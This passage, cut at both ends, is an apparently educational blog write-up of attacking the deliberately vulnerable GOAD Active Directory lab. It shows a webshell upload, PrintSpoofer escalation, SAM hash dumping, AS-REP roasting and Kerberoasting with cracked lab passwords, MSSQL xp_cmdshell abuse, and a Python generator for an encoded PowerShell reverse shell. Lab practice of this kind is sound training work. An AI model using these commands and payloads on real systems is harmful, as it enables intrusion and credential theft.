+</span></span><span class="line"><span class="cl">| NetBIOS_Computer_Name: CASTELBLACK +</span></span><span class="line"><span class="cl">| DNS_Domain_Name: north.sevenkingdoms.local +</span></span><span class="line"><span class="cl">| DNS_Computer_Name: castelblack.north.sevenkingdoms.local +</span></span><span class="line"><span class="cl">| DNS_Tree_Name: sevenkingdoms.local +</span></span><span class="line"><span class="cl">|_ Product_Version: 10.0.17763 +</span></span><span class="line"><span class="cl">| ms-sql-info: +</span></span><span class="line"><span class="cl">| 192.168.0.152:1433: +</span></span><span class="line"><span class="cl">| Version: +</span></span><span class="line"><span class="cl">| name: Microsoft SQL Server 2019 RTM +</span></span><span class="line"><span class="cl">| number: 15.00.2000.00 +</span></span><span class="line"><span class="cl">| Product: Microsoft SQL Server 2019 +</span></span><span class="line"><span class="cl">| Service pack level: RTM +</span></span><span class="line"><span class="cl">| Post-SP patches applied: false +</span></span><span class="line"><span class="cl">|_ TCP port: 1433 +</span></span><span class="line"><span class="cl">|_ssl-date: 2024-11-08T06:28:57+00:00; 0s from scanner time. +</span></span><span class="line"><span class="cl">| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback +</span></span><span class="line"><span class="cl">| Not valid before: 2024-11-08T06:28:14 +</span></span><span class="line"><span class="cl">|_Not valid after: 2054-11-08T06:28:14 +</span></span><span class="line"><span class="cl">3389/tcp open ms-wbt-server Microsoft Terminal Services +</span></span><span class="line"><span class="cl">| rdp-ntlm-info: +</span></span><span class="line"><span class="cl">| Target_Name: NORTH +</span></span><span class="line"><span class="cl">| NetBIOS_Domain_Name: NORTH +</span></span><span class="line"><span class="cl">| NetBIOS_Computer_Name: CASTELBLACK +</span></span><span class="line"><span class="cl">| DNS_Domain_Name: north.sevenkingdoms.local +</span></span><span class="line"><span class="cl">| DNS_Computer_Name: castelblack.north.sevenkingdoms.local +</span></span><span class="line"><span class="cl">| DNS_Tree_Name: sevenkingdoms.local +</span></span><span class="line"><span class="cl">| Product_Version: 10.0.17763 +</span></span><span class="line"><span class="cl">|_ System_Time: 2024-11-07T17:15:22+00:00 +</span></span><span class="line"><span class="cl">|_ssl-date: 2024-11-07T17:15:27+00:00; -2s from scanner time. +</span></span><span class="line"><span class="cl">| ssl-cert: Subject: commonName=castelblack.north.sevenkingdoms.local +</span></span><span class="line"><span class="cl">| Not valid before: 2024-11-06T09:32:35 +</span></span><span class="line"><span class="cl">|_Not valid after: 2025-05-08T09:32:35 +</span></span><span class="line"><span class="cl">Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows +</span></span><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl">Host script results: +</span></span><span class="line"><span class="cl">|_clock-skew: mean: -1s, deviation: 0s, median: -1s +</span></span><span class="line"><span class="cl">|_nbstat: NetBIOS name: CASTELBLACK, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: 08:00:27:7a:a2:fc (Oracle VirtualBox virtual NIC) +</span></span><span class="line"><span class="cl">| smb2-security-mode: +</span></span><span class="line"><span class="cl">| 3:1:1: +</span></span><span class="line"><span class="cl">|_ Message signing enabled but not required +</span></span><span class="line"><span class="cl">| smb2-time: +</span></span><span class="line"><span class="cl">| date: 2024-11-07T17:15:22 +</span></span><span class="line"><span class="cl">|_ start_date: N/A +</span></span></code></pre></td></tr></table> +</div> +</div><hr> +<ul> +<li> +<p>domains - sevenkingdoms.local north.sevenkingdoms.local</p> +</li> +<li> +<p>192.168.0.150 - kingslanding.sevenkingdoms.local sevenkingdoms.local</p> +</li> +<li> +<p>192.168.0.151 - winterfell.north.sevenkingdoms.local north.sevenkingdoms.local</p> +</li> +<li> +<p>192.168.0.152 - castelblack.north.sevenkingdoms.local</p> +</li> +</ul> +<hr> +<h3 id="web-server">web server +</h3><p><img src="https://f0rk3b0mb.github.io/images/goad_light/web.jpeg" + + + + loading="lazy" + + alt="webpage" + + +></p> +<p>there is a webpage that allows file upload , there are no filters so i upload a .aspx reverse shell payload</p> +<p>we get a shell</p> +<p><img src="https://f0rk3b0mb.github.io/images/goad_light/web_shell.jpeg" + + + + loading="lazy" + + alt="shell" + + +></p> +<p>The current user &ldquo;iis apppool\defaultapppool&rdquo; has the following priviledges SeImpersonatePrivilege</p> +<p>This can be exploited using prinspoofer &raquo; <a class="link" href="https://github.com/itm4n/PrintSpoofer" target="_blank" rel="noopener" + >here</a></p> +<div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt">1 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">.\printspoofer.exe -i -c cmd +</span></span></code></pre></td></tr></table> +</div> +</div><p>We are now the user &ldquo;nt authority\system&rdquo;</p> +<p>From here we can extract the sam.hive and system.hive since we have the full control on the system.</p> +<div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt">1 +</span><span class="lnt">2 +</span><span class="lnt">3 +</span><span class="lnt">4 +</span><span class="lnt">5 +</span><span class="lnt">6 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl">reg save hklm\sam .\sam.hive +</span></span><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl">reg save hklm\system .\system.hive +</span></span><span class="line"><span class="cl"> +</span></span></code></pre></td></tr></table> +</div> +</div><p>From these we can get the Administrator ntlm hash that we can use to login</p> +<div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt"> 1 +</span><span class="lnt"> 2 +</span><span class="lnt"> 3 +</span><span class="lnt"> 4 +</span><span class="lnt"> 5 +</span><span class="lnt"> 6 +</span><span class="lnt"> 7 +</span><span class="lnt"> 8 +</span><span class="lnt"> 9 +</span><span class="lnt">10 +</span><span class="lnt">11 +</span><span class="lnt">12 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">impacket-secretsdump -sam sam.hive -system system.hive LOCAL +</span></span><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl">[*] Target system bootKey: 0xe58fc6e5f506631517c563ede86bead7 +</span></span><span class="line"><span class="cl">[*] Dumping local SAM hashes (uid:rid:lmhash:nthash) +</span></span><span class="line"><span class="cl">Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4::: +</span></span><span class="line"><span class="cl">Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: +</span></span><span class="line"><span class="cl">DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: +</span></span><span class="line"><span class="cl">WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:4363b6dc0c95588964884d7e1dfea1f7::: +</span></span><span class="line"><span class="cl">vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: +</span></span><span class="line"><span class="cl">[*] Cleaning up... +</span></span></code></pre></td></tr></table> +</div> +</div><p>We can successfully login via winrm in winterfell.north.sevenkingdoms.local and castleblack.north.sevenkingdoms.local as user Administrator</p> +<p><img src="https://f0rk3b0mb.github.io/images/goad_light/hash.jpeg" + + + + loading="lazy" + + alt="login" + + +></p> +<p>This is an easy way to pwn both machines , ill try to find another way in.</p> +<hr> +<h3 id="enumerate-users">Enumerate users +</h3><div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt">1 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-gdscript3" data-lang="gdscript3"><span class="line"><span class="cl"><span class="n">enum4linux</span> <span class="o">-</span><span class="n">U</span> <span class="mf">192.168</span><span class="o">.</span><span class="mf">0.150</span> +</span></span></code></pre></td></tr></table> +</div> +</div><div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt"> 1 +</span><span class="lnt"> 2 +</span><span class="lnt"> 3 +</span><span class="lnt"> 4 +</span><span class="lnt"> 5 +</span><span class="lnt"> 6 +</span><span class="lnt"> 7 +</span><span class="lnt"> 8 +</span><span class="lnt"> 9 +</span><span class="lnt">10 +</span><span class="lnt">11 +</span><span class="lnt">12 +</span><span class="lnt">13 +</span><span class="lnt">14 +</span><span class="lnt">15 +</span><span class="lnt">16 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">Administrator +</span></span><span class="line"><span class="cl">Guest +</span></span><span class="line"><span class="cl">arya.stark +</span></span><span class="line"><span class="cl">brandon.stark +</span></span><span class="line"><span class="cl">catelyn.stark +</span></span><span class="line"><span class="cl">eddard.stark +</span></span><span class="line"><span class="cl">hodor +</span></span><span class="line"><span class="cl">jeor.mormont +</span></span><span class="line"><span class="cl">jon.snow +</span></span><span class="line"><span class="cl">krbtgt +</span></span><span class="line"><span class="cl">rickon.stark +</span></span><span class="line"><span class="cl">robb.stark +</span></span><span class="line"><span class="cl">samwell.tarly &gt;&gt;&gt; Heartsbane +</span></span><span class="line"><span class="cl">sansa.stark +</span></span><span class="line"><span class="cl">sql_svc +</span></span><span class="line"><span class="cl">vagrant +</span></span></code></pre></td></tr></table> +</div> +</div><p>we get one password in the users description</p> +<p>we can enumerate users while using the creds to discover more</p> +<hr> +<p>We test for password reuse and to check what services we can access with the creds</p> +<div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt">1 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">crackmapexec winrm -u users.txt -p pass.txt -d north.sevenkingdoms.local 192.168.0.152 --continue-on-success +</span></span></code></pre></td></tr></table> +</div> +</div><p><img src="https://f0rk3b0mb.github.io/images/goad_light/winrm.jpeg" + + + + loading="lazy" + + alt="winrm" + + +></p> +<hr> +<h3 id="asreproasting">ASREProasting +</h3><div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt">1 +</span><span class="lnt">2 +</span><span class="lnt">3 +</span><span class="lnt">4 +</span><span class="lnt">5 +</span><span class="lnt">6 +</span><span class="lnt">7 +</span><span class="lnt">8 +</span><span class="lnt">9 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl">impacket-GetNPUsers north.sevenkingdoms.local/ -no-pass -usersfile users.txt +</span></span><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl">[-] User sansa.stark doesn&#39;t have UF_DONT_REQUIRE_PREAUTH set +</span></span><span class="line"><span class="cl">$krb5asrep$23$brandon.stark@NORTH.SEVENKINGDOMS.LOCAL:f080ed05bd30304fa0bea81ca05405f6$ca17da3a99435d0bf66642dfe2ada0c9febfb7184b6443b2c023e67198024d298c66105c63f033e98ebdb6162aff103f2f7a79cf367f4b1cea1a70e3a2b695c5a39d02b5b4b87e90dfce2622072ea26b070feef5d313878872ebf79559df740409413228019091a3bf3aee425795bbdddfc2d8aa80f3c209339b29e5a1ad0d74b0230c8028ef1c778f7b43ab3a34e9d37f680506a82e8b552d0da1e53f8105bb6ba92bf3bc204685e86838b8fa12bc8365076df3022725ef90ef43ed3455f6e516477410d24689b4a557b24be888e54ef783ccdf0428f018a51e000e653a8f90a1aebc8929bdb95d897671c4e53538b5f420daba510dee349dc4b9f85cf40d3a3b5e2603bc6e +</span></span><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl">$krb5asrep$23$brandon.stark@NORTH.SEVENKINGDOMS.LOCAL:11e9b0e6b849834048f19d77ffaab958$3218a7897d46cd4c6cc28ab77e3ff8893f0e530446cbb02a28fcf80b8b3a83696826fa6db255a97cd634a41049f2d72240b2a3bde89dfdc3e7e40d7057fbe83d51b7bb87487fe89625c5a9f99b97130b4c69c7e9f0518869044366a7abfb6df8e0044a3f21c2f025ba58e56476c18b6ea944aadde9790d1d38a4590f052967e3262962998cabce6ecdba1e30e5e1cd77b303b18cac80d1bfa06f04bf9d5e830bd9140817a985b4fc16288556cb954920a2fedbaf245d2750bf32552026a53685766029c3c6d5a1219a3a6a126fdf64b55c4648621f8a88846c6be559c195df989f78b2b10cb2a2200a70c1e87eb6175992aafb3bc281d0b85da89ce461dc08d1a69c112573d5 +</span></span></code></pre></td></tr></table> +</div> +</div><p>We can try to crack the hashes with hashcat</p> +<div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt">1 +</span><span class="lnt">2 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl">hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt +</span></span></code></pre></td></tr></table> +</div> +</div><p>we get &ldquo;brandon.stark : iseedeadpeople&rdquo;</p> +<hr> +<h3 id="kerberoasting">KERBEroasting +</h3><div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt">1 +</span><span class="lnt">2 +</span><span class="lnt">3 +</span><span class="lnt">4 +</span><span class="lnt">5 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">impacket-GetUserSPNs -dc-ip 192.168.0.151 north.sevenkingdoms.local/brandon.stark:iseedeadpeople -request +</span></span><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl">$krb5tgs$23$*jon.snow$NORTH.SEVENKINGDOMS.LOCAL$north.sevenkingdoms.local/jon.snow*$1d34574ce34accafda00ef02b9da270f$16e9888818297ed29f8a91374159c93fcf29790fc0aabb9efa7038fde3cf37aa9724f1b0c8e05a4ce8d0cc19dd362666c78a1cfd643305c3b4b62361ff6675b46d6ddc10515a0a5a39c4b4d19c1c9c2642efeea3ab97724cdb57cf7ba885cc3bf5fe417fad67122be19b4adb8ee9ed27d55fdd117de355b1e8745e1b817cd650671c6a81e7f4803a95321811ed14167a2b798d37d2b7ae035d1df2b4ce2e030c90ad91f26c61925704acf3144f4717eb313e58ccaa665330fa705685aa2c053dba4b1f5fa1df384b9bd4720b3c94813cdec25e0506ec1b254ebf9eec7973420d1cf81f98408fc1a890c04e0712b3ea29bea9129457b4c9f6754f486972b05bdfea081be903e7b9ce0a3170829759643f288e31e0482f265585692c1ba6eceda0e3c4a07ecd1ea9e3423ba489b429390aa002e35027cd7b23552758b754a3138760281f1f9c68ed389f11c2fd891e7d4d7949f02924f76789c90df7fb096760768486a7c7100f487477818ed6c887af5eee13a5f71742ea4f866c3675b0a18197e2908644e39a05803970cc5ba1943006609e130e3185a658fcac6f8a589b8abd495a7e35f5b94256933c1467e7accc87f2bb83f1b8002a3dc6f97fb13f1b724eca06e0438597733aa0fef9cd71e736f02290a04e33bc5e1916043d3e2aeadd4712ce5671e605c29eaef21c7f6a80ae1e8fc260fb75f4fc21fc6a1896cf8ebcdd221cc6d9a30b7fd15f7866276320437765dfcda8be683e23be0af007a1490361a03d9cda1b45791a0feecac98db7e591eb61f09dd5b32a5953736987b10311e1f21a8a734e950859d4af97cbd71c354b285050291979f5134c1aaa2675dbe72bb25b59e3a17351a2444e2ac92f160043dfad2a3a2f306aca871ec0b96488ee8a9ef4a61c0bce6e67319791427fac89be54a294db5025fcb2cd496673ac6aadd9a6c62d403d925de0541482a77046c0e2b01e94f5b6873ff4389159a693c9daaf87d5fc8ae0bc270fafedd57a4f2a1eba4d09f51bce273b35915168b845da58d1539527076d43018d4da5fd00f0614ea005cb87563a5be8bbf3b7dfd9cd367b78fb3caae1fb5c0b33aeef66b00e4f4180688858c55a215e45bd35b703531a22c8b6c167fba4b64d8641c0fe5d92a1ed8b9ce7152dd49fbbf9702bcd9c5413f33e339854b0d40980ed340c0da2c7bf70763076d6eef8e1b2fe04867a7f413506792037593087582fe71944241573b66af339eaa1b6e4834b7fcb0493c527a8e5aa9939b0be1dfcb18c1d4d4f7e3cfdbb4536c13959205305817dd9e024d60d75377027c96365a739b3f08567f755881002d416eba6979d857acf95ebe715c50a0fb3e9760c8a86f9c27cdd203f8b38fd41cc51727914d6cf551a6a585c002115a36f0faebf8c9626c4c2fd07dc2ddd61e9ed1649ac05531c1acc0a719b55e1bb138fdd19e95ce2fd6598bf5fadc3f8c11aa5de8a7603a0c9d3436d84851fc501a75c1906f29e11a61e6f6c07b6d7bc01 +</span></span><span class="line"><span class="cl">$krb5tgs$23$*sql_svc$NORTH.SEVENKINGDOMS.LOCAL$north.sevenkingdoms.local/sql_svc*$84792126b6065b19368a23f2d3f946f0$261a5265d61be8c8f584a9a1c2c64e61601d81421669de0bdcf1ded1a12cdd258414965992eff28bce23b5ba37b187a3e703cb308ce4d3dc053e5fa6a32a35efbe39e39b1e5a6716613fc54c84aaf533e491f306026ffdcb37585b377a4dfa0b8f43bede9baec2cbda0a35f608af18f0c310e2011c79df83861d136a895dbf79dcd60a8f60a0e621cb38d12659856ea8175c5f25a1c6a3fbf416576e7f78827ce04df3ccda4dd720d28b9142ec97ff2d4cdf8a90bb71c139e9b379ec83a4f06b1061850b51b5a3b5945dda4b7ecc8d0b496ec218a763529aa677ff87faac058f4734351a4e8b4101e5e42f014969696bb0f94f619e8a82e8ce52f0b83f67a9aebb317cc377415210eee3f7c8557c29c5d93430e4d38b8f16f9b392476e4e82eb7c8118a5af99c52e6b97982dc131bd67d3fb1a0bbb910b50bde9071ea6e2200d926b209a0edae9ec922d9ec72b359aaaa3939f8442759cc247e4b23e824909897f12f560213a458b8fd635fdc48fdaef5c87f75342582719c87c24e1d479d4c1bc1e5860c38982a828f10af5afe728daf78c41b80b9e8d23b218d84010a052f4815ae48737d754d7c2662dfc9250587795bd417fbe3ee7406fd485103bea60c0d3162241b73affb286fb75e6479b1c9a564fad284622ab917068f0715e3521aa3b971f533e52d298377ac1f0284681367c75cafe05407fbe378afebb50df4be14378ff3131b93c8b33e8fb34420e6e166edd507abd729826e3fee1d5d882c983e6a4c3400698dbe15a3f0722a6bca18687e06710d6ff53578881a524a6b9e12ad25ac8376a75351cc4301e4379d5ee9f196550df0aa47fbe3c09890cfd84c48182c63a411d1c2a3c480c09d2c624d0ac3679cc2aa2c7eb7b8755c585b6075e4c77be5ac8a9338904098b3bdcb79fd7fab1f6cee55641bf6e113790951528b78821e508d07a59c0f1da04e944048f5c346a75ebd9899d7fc9da096a75587a103b2a95a50ada643044d8107859024bec2215107df01ed17cecef2c5e2573c625d45ddef49f4128f22d63ebddd7beb815ef6db2c64999b74fa800a39886c844a8955052e59c7708bd6aa1fb4a2ee874c7fb644cfa7f782b479c71b4cb89a8452629444a6a0522d2d82401a6e722b06aa067eaf6f002c3b2bf0a41ffbb2419fc4454f5d6f17e9888fd597428452a02ad795872cad2389e54b541a9d200759dd6cab82456da66aab93d62a8c3b4761c7e72684a294a37b1ae2a4ff81de17d686893c74a1eb786d4dcd3b3b91e8aea09e66d8ff3d70cea1f10ea19eaa5968798f52336c0d76357c8844914656aa720b6cc0bcc52049b6befa4d9de59f7de764dea1c52814f55737efd49625126adf6075289221d9869ca7165fbf6bef70318c18fb5f46dd722c9bcb019a690462cf369fc1eb1e97dda1a7e172f83f0c44064e4f4d03184e265216647750f50926d396f1a67820b2c2c8221e72ba49bd8612cf3cabdccee89f2cfdb467a7615a96681ab1b7b +</span></span></code></pre></td></tr></table> +</div> +</div><p>we get password &ldquo;jon.snow : iknownothing&rdquo;</p> +<p>This user can login via RDP on winterfell and MQSQL on castleblack</p> +<div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt">1 +</span><span class="lnt">2 +</span><span class="lnt">3 +</span><span class="lnt">4 +</span><span class="lnt">5 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl">crackmapexec mssql castleblack.north.sevenkingdoms.local -u jon.snow -p iknownothing -d north.sevenkingdoms.local +</span></span><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl">MSSQL castleblack 1433 None [*] None (name:castleblack.north.sevenkingdoms.local) (domain:north.sevenkingdoms.local) +</span></span><span class="line"><span class="cl">MSSQL castleblack 1433 None [+] north.sevenkingdoms.local\jon.snow:iknownothing (Pwn3d!) +</span></span></code></pre></td></tr></table> +</div> +</div><hr> +<h3 id="mssql">MSSQL +</h3><div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt">1 +</span><span class="lnt">2 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl">impacket-mssqlclient -windows-auth north.sevenkingdoms.local/jon.snow:iknownothing@192.168.0.152 +</span></span></code></pre></td></tr></table> +</div> +</div><p>Checking impersonation abilities</p> +<div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt"> 1 +</span><span class="lnt"> 2 +</span><span class="lnt"> 3 +</span><span class="lnt"> 4 +</span><span class="lnt"> 5 +</span><span class="lnt"> 6 +</span><span class="lnt"> 7 +</span><span class="lnt"> 8 +</span><span class="lnt"> 9 +</span><span class="lnt">10 +</span><span class="lnt">11 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">execute as database permission_name state_desc grantee grantor +</span></span><span class="line"><span class="cl">---------- -------- --------------- ---------- ------------------- ---------------------------- +</span></span><span class="line"><span class="cl">b&#39;USER&#39; master IMPERSONATE GRANT NORTH\arya.stark dbo +</span></span><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl">b&#39;USER&#39; msdb IMPERSONATE GRANT NORTH\arya.stark dbo +</span></span><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl">b&#39;USER&#39; msdb IMPERSONATE GRANT dc_admin MS_DataCollectorInternalUser +</span></span><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl">b&#39;LOGIN&#39; b&#39;&#39; IMPERSONATE GRANT NORTH\samwell.tarly sa +</span></span><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl">b&#39;LOGIN&#39; b&#39;&#39; IMPERSONATE GRANT NORTH\brandon.stark NORTH\jon.snow +</span></span></code></pre></td></tr></table> +</div> +</div><ul> +<li>A “Login” grants the principal entry into the SERVER</li> +<li>A “User” grants a login entry into a single DATABASE</li> +</ul> +<p>User &ldquo;samwell.tarly&rdquo; can impersonate login of &ldquo;sa&rdquo;, so we have to login to mssql as samwell first and then run.</p> +<div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt">1 +</span><span class="lnt">2 +</span><span class="lnt">3 +</span><span class="lnt">4 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl">exec_as_login sa +</span></span><span class="line"><span class="cl">enable_xp_cmdshell +</span></span><span class="line"><span class="cl">xp_cmdshell whoami +</span></span></code></pre></td></tr></table> +</div> +</div><p>from here we can get a reverse shell as user sql_svc</p> +<div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt"> 1 +</span><span class="lnt"> 2 +</span><span class="lnt"> 3 +</span><span class="lnt"> 4 +</span><span class="lnt"> 5 +</span><span class="lnt"> 6 +</span><span class="lnt"> 7 +</span><span class="lnt"> 8 +</span><span class="lnt"> 9 +</span><span class="lnt">10 +</span><span class="lnt">11 +</span><span class="lnt">12 +</span><span class="lnt">13 +</span><span class="lnt">14 +</span><span class="lnt">15 +</span><span class="lnt">16 +</span><span class="lnt">17 +</span><span class="lnt">18 +</span><span class="lnt">19 +</span><span class="lnt">20 +</span><span class="lnt">21 +</span><span class="lnt">22 +</span><span class="lnt">23 +</span><span class="lnt">24 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-gdscript3" data-lang="gdscript3"><span class="line"><span class="cl"><span class="c1">#!/usr/bin/env python</span> +</span></span><span class="line"><span class="cl"><span class="n">import</span> <span class="n">base64</span> +</span></span><span class="line"><span class="cl"><span class="n">import</span> <span class="n">sys</span> +</span></span><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="n">len</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">3</span><span class="p">:</span> +</span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="s1">&#39;usage : </span><span class="si">%s</span><span class="s1"> ip port&#39;</span> <span class="o">%</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span> +</span></span><span class="line"><span class="cl"> <span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> +</span></span><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl"><span class="n">payload</span><span class="o">=</span><span class="s2">&#34;&#34;&#34; +</span></span></span><span class="line"><span class="cl"><span class="s2">$c = New-Object System.Net.Sockets.TCPClient(&#39;</span><span class="si">%s</span><span class="s2">&#39;,</span><span class="si">%s</span><span class="s2">); +</span></span></span><span class="line"><span class="cl"><span class="s2">$s = $c.GetStream();[byte[]]$b = 0..65535|</span><span class="si">%%</span><span class="s2">{0}; +</span></span></span><span class="line"><span class="cl"><span class="s2">while(($i = $s.Read($b, 0, $b.Length)) -ne 0){ +</span></span></span><span class="line"><span class="cl"><span class="s2"> $d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i); +</span></span></span><span class="line"><span class="cl"><span class="s2"> $sb = (iex $d 2&gt;&amp;1 | Out-String ); +</span></span></span><span class="line"><span class="cl"><span class="s2"> $sb = ([text.encoding]::ASCII).GetBytes($sb + &#39;ps&gt; &#39;); +</span></span></span><span class="line"><span class="cl"><span class="s2"> $s.Write($sb,0,$sb.Length); +</span></span></span><span class="line"><span class="cl"><span class="s2"> $s.Flush() +</span></span></span><span class="line"><span class="cl"><span class="s2">}; +</span></span></span><span class="line"><span class="cl"><span class="s2">$c.Close() +</span></span></span><span class="line"><span class="cl"><span class="s2">&#34;&#34;&#34;</span> <span class="o">%</span> <span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">])</span> +</span></span><span class="line"><span class="cl"> +</span></span><span class="line"><span class="cl"><span class="n">byte</span> <span class="o">=</span> <span class="n">payload</span><span class="o">.</span><span class="n">encode</span><span class="p">(</span><span class="s1">&#39;utf-16-le&#39;</span><span class="p">)</span> +</span></span><span class="line"><span class="cl"><span class="n">b64</span> <span class="o">=</span> <span class="n">base64</span><span class="o">.</span><span class="n">b64encode</span><span class="p">(</span><span class="n">byte</span><span class="p">)</span> +</span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="s2">&#34;powershell -exec bypass -enc </span><span class="si">%s</span><span class="s2">&#34;</span> <span class="o">%</span> <span class="n">b64</span><span class="o">.</span><span class="n">decode</span><span class="p">())</span> +</span></span></code></pre></td></tr></table> +</div> +</div><hr> +<h3 id="bloodhound">Bloodhound +</h3><div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt">1 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">bloodhound-python -u brandon.stark -p iseedeadpeople -d north.sevenkingdoms.local -c all -dc winterfell.north.sevenkingdoms.local -ns 192.168.0.151 +</span></span></code></pre></td></tr></table> +</div> +</div><p>Here we can mark the high value targets and the users that we have compromised. Bloodhound is useful to get a visual representation of the active directory environment.</p> +<hr> +<h3 id="privilege-escalation">Privilege escalation +</h3><p>We can modify the GPO &quot;&quot; as user samwell.tarly</p> +<p><img src="https://f0rk3b0mb.github.io/images/goad_light/privesc.jpeg" + + + + loading="lazy" + + alt="bloodhound" + + +></p> +<p>Here we willl utilize a tool <a class="link" href="https://github.com/Hackndo/pyGPOAbuse" target="_blank" rel="noopener" + >pygpoabuse</a></p> +<p>We need to get the gpoid , this can be done by loggin in via rdp as jon.snow and running</p> +<div class="highlight"><div class="chroma"> +<table class="lntable"><tr><td class="lntd"> +<pre tabindex="0" class="chroma"><code><span class="lnt">1 +</span></code></pre></td> +<td class="lntd"> +<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">Get-GPO -All -Domain 